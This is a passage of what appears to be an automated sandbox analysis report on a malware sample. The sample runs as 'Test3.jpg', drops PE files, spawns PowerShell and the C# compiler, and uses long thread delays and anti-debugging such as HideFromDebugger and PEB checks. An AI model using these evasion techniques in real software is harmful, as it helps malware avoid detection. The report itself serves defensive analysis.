      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psm1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxml
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.xaml
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5429
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1580
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgWindow / User API: threadDelayed 2267
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Test1.txtJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.dllJump to dropped file
      Source: C:\Windows\System32\conhost.exe TID: 6928Thread sleep count: 213 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7048Thread sleep count: 5429 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7076Thread sleep count: 41 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7052Thread sleep count: 1580 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4456Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7104Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7024Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7112Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5676Thread sleep count: 2267 > 30
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5784Thread sleep count: 38 > 30
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5784Thread sleep time: -380000s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5840Thread sleep time: -3689348814741908s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5192Thread sleep count: 297 > 30
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5192Thread sleep time: -30000s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread sleep count: Count: 2267 delay: -10
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_00426F7A GetFullPathNameW,FindFirstFileExW,GetLastError,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_0044A238 __EH_prolog,new,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetProductInfo,
      Source: ModuleAnalysisCache.3.drBinary or memory string: Add-VMNetworkAdapter
      Source: ModuleAnalysisCache.3.drBinary or memory string: Remove-VMNetworkAdapterExtendedAcl
      Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VMNetworkAdapterTeamMapping
      Source: ModuleAnalysisCache.3.drBinary or memory string: Connect-VMNetworkAdapter
      Source: ModuleAnalysisCache.3.drBinary or memory string: Add-VMNetworkAdapterExtendedAcl
      Source: WMIC.exe, 0000001A.00000002.345562483.0000000003920000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapterTeamMapping
      Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapterIsolation
      Source: ModuleAnalysisCache.3.drBinary or memory string: Test-VMNetworkAdapter
      Source: ModuleAnalysisCache.3.drBinary or memory string: )Get-VMNetworkAdapterFailoverConfiguration
      Source: ModuleAnalysisCache.3.drBinary or memory string: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
      Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VMNetworkAdapterRdma
      Source: ModuleAnalysisCache.3.drBinary or memory string: (Set-VMNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.drBinary or memory string: Remove-VMNetworkAdapterTeamMapping
      Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapterAcl
      Source: ModuleAnalysisCache.3.drBinary or memory string: )Set-VMNetworkAdapterFailoverConfiguration
      Source: ModuleAnalysisCache.3.drBinary or memory string: Rename-VMNetworkAdapter
      Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapterVlan
      Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VMNetworkAdapterIsolation
      Source: ModuleAnalysisCache.3.drBinary or memory string: (Add-VmNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.drBinary or memory string: "Remove-VMNetworkAdapterTeamMapping
      Source: ModuleAnalysisCache.3.drBinary or memory string: Remove-VMNetworkAdapterAcl
      Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapter
      Source: ModuleAnalysisCache.3.drBinary or memory string: Add-VMScsiController
      Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VmNetworkAdapterIsolation
      Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VmNetworkAdapterRoutingDomainMapping
      Source: WMIC.exe, 0000001A.00000002.345562483.0000000003920000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMScsiController
      Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapterRdma
      Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VMNetworkAdapterRoutingDomainMapping
      Source: WMIC.exe, 0000001A.00000002.345562483.0000000003920000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VMNetworkAdapterVlan
      Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VmNetworkAdapterIsolation
      Source: ModuleAnalysisCache.3.drBinary or memory string: Disconnect-VMNetworkAdapter
      Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VMNetworkAdapter
      Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.drBinary or memory string: "Remove-VMNetworkAdapterExtendedAcl
      Source: ModuleAnalysisCache.3.drBinary or memory string: KC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
      Source: ModuleAnalysisCache.3.drBinary or memory string: +Remove-VMNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.drBinary or memory string: (Add-VMNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.drBinary or memory string: Add-VMNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.drBinary or memory string: (Get-VMNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.drBinary or memory string: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
      Source: ModuleAnalysisCache.3.drBinary or memory string: Add-VMNetworkAdapterAcl
      Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VMNetworkAdapterFailoverConfiguration
      Source: ModuleAnalysisCache.3.drBinary or memory string: Add-VmNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.drBinary or memory string: Remove-VMScsiController
      Source: ModuleAnalysisCache.3.drBinary or memory string: OC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
      Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapterFailoverConfiguration
      Source: ModuleAnalysisCache.3.drBinary or memory string: Remove-VMNetworkAdapter
      Source: ModuleAnalysisCache.3.drBinary or memory string: (Set-VmNetworkAdapterRoutingDomainMapping
      Source: WMIC.exe, 0000001A.00000002.345562483.0000000003920000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: ModuleAnalysisCache.3.drBinary or memory string: Remove-VMNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapterExtendedAcl
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

      Anti Debugging:

      barindex
      Contains functionality to hide a thread from the debuggerShow sources
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_00478772 NtSetInformationThread ?,00000011,00000000,00000000,?,?,00000000,00000000
      Hides threads from debuggersShow sources
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_0058E501 IsDebuggerPresent,OutputDebugStringW,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_007D5210 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_004252D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_00424F75 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_00424FD2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_00424FE7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_00424FFB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_022100C7 mov eax, dword ptr fs:[00000030h]
